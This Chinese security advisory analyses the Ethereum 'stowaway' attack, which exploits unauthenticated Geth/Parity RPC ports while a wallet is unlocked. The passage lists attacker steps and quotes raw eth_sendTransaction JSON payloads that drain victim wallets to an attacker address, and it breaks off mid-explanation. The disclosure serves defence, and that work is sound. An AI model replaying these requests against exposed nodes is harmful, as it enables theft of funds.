以太坊潜伏多年令全球黑客为之疯狂的“偷渡”漏洞,引发偷币狂潮

世界上有一群人，互联网对于他们来说就是提款机。

是的，过去是，现在更是，因为电子货币的出现，他们提款的速度变得更疯狂。

在2017年，我们的蜜罐监测到一起针对以太坊的全球大规模攻击事件，我们将其命名为以太坊“偷渡”漏洞。

通过该漏洞，黑客可以在没有服务器权限、没有keystore密码权限的情况下，转走钱包中的所有余额。

而如此严重的漏洞，1年前就在reddit.com被曝光有黑客在利用，并且最早可追溯到2016年的2月14号就有黑客通过此漏洞窃取到比特币：

（https://www.reddit.com/r/ethereum/comments/4z0mvi/ethereum_nodes_with_insecure_rpc_settings_are/）

近期也有中国的慢雾安全团队揭露了这种攻击手法：

（https://mp.weixin.qq.com/s/Kk2lsoQ1679Gda56Ec-zJg）

在长达2年的时间里，并没有多少用户关注到，以太坊也没有进行针对性的防护措施，直到今日，以太坊的最新代码中依然没有能够抵御这种攻击。

因此我们决定将我们所掌握的详细数据公布给所有人，希望能促使以太坊的开发者承认并修复该漏洞。

漏洞成因（以下的代码分析基于https://github.com/ethereum/go-ethereum的当前最新提交：commit b1917ac9a3cf4716460bd53a11db40384103e5e2）

以太坊目前最流行的节点程序（Geth/Parity ）都提供了RPC API，用于对接矿池、钱包等其他第三方程序。

默认情况下，节点的RPC服务是无需密码就可以进行接口调用，官方实现的RPC API也并未提供设置RPC连接密码的功能，因此，一旦将RPC端口暴露在互联网，将会非常危险。

而我们所捕获的以太坊“偷渡”漏洞，正是利用了以太坊默认对RPC不做鉴权的设计。

被攻击的用户，需要具备以下条件：

1、节点的RPC端口对外开放

2、节点的RPC端口可直接调用API，未做额外的鉴权保护（如通过nginx等方式进行鉴权保护）

3、节点的区块高度已经同步到网络的最新高度，因为需要在该节点进行转账，如果未达到最高度，无法进行转账

当用户对自己的钱包进行了解锁（unlockAccount函数），在解锁超时期间，无需再输入密码，便可调用RPC API的eth_sendTransaction进行转账操作。

漏洞的关键组成，由未鉴权的RPC API服务及解锁账户后有一定的免密码时间相结合，以下是解锁账户的unlockAccount函数：

代码路径：go-ethereum/internal/jsre/deps/api.go

通过函数的实现代码可见，解锁账户的api允许传入超时时间，默认超时为300秒，

真正进行解锁的函数TimedUnlock实现如下：

代码路径：go-ethereum/accounts/keystore/keystore.go

当传入的超时大于0时，会发起一个协程进行超时处理，如果传入的超时时间为0，则是永久不会超时，账户一直处于解锁状态，直到节点进程退出。

详细的用法参考官方文档：https://github.com/ethereum/go-ethereum/wiki/Management-APIs#personal_unlockaccount

攻击手法揭秘

1.寻找对外开放以太坊RPC端口的服务器，确认节点已经达到以太坊网络的最高区块高度

黑客通过全球的端口服务扫描，发现RPC服务为以太坊的RPC接口时，调用eth_getBlockByNumber(‘last’, false)，获取最新的区块高度。

但是由于有些以太节点是以太坊的分叉币，高度与以太坊的不一样，因此黑客即使发现节点高度与以太坊的高度不一样，也不会放弃攻击。

2.调用eth_accounts，获取该节点上的所有账户。

eth_accounts的请求将返回一个账户地址列表：[0x1834axxxxxxxxxxxxxxxxxxxxxxxxxxx, 0xa13jkcxxxxxxxxxxxxxxxxxxxxxxxxxxx,…… ]

3.调用eth_getBalance，查询地址余额。

这个过程黑客可在自己的服务器完成以太坊的余额查询，因为以太坊的区块链账本数据库是随意公开获取的。

有部分黑客没有搭建以太坊的全节点，没有自行查询余额，因此也会在被攻击服务器进行eth_getBalance操作。

4.持续调用转账操作，直到刚好用户用密码解锁了钱包，完成非法转账操作的“偷渡”

黑客会构造eth_sendTransaction的转账操作，并填写余额、固定的手续费：

{“jsonrpc”:”2.0″,”id”:2,”method”:”eth_sendTransaction”,”params”:[{“from”:”受害者钱包地址1″,”gas”:”0x55f0″,”to”:”0xdc3431d42c0bf108b44cb48bfbd2cd4d392c32d6″,”value”:”0x112345fc212345000″}]}

{“jsonrpc”:”2.0″,”id”:2,”method”:”eth_sendTransaction”,”params”:[{“from”:”受害者钱包地址2″,”gas”:”0x55f0″,”to”:”0xdc3431d42c0bf108b44cb48bfbd2cd4d392c32d6″,”value”:”0x112345fc212345000″}]}

{“jsonrpc”:”2.0″,”id”:2,”method”:”eth_sendTransaction”,”params”:[{“from”:”受害者钱包地址3″,”gas”:”0x55f0″,”to”:”0xdc3431d42c0bf108b44cb48bfbd2cd4d392c32d6″,”value”:”0x112345fc212345000″}]}

其中的value的单位是以太的最小单位：wei，计算为以太的话需要除10的18次方：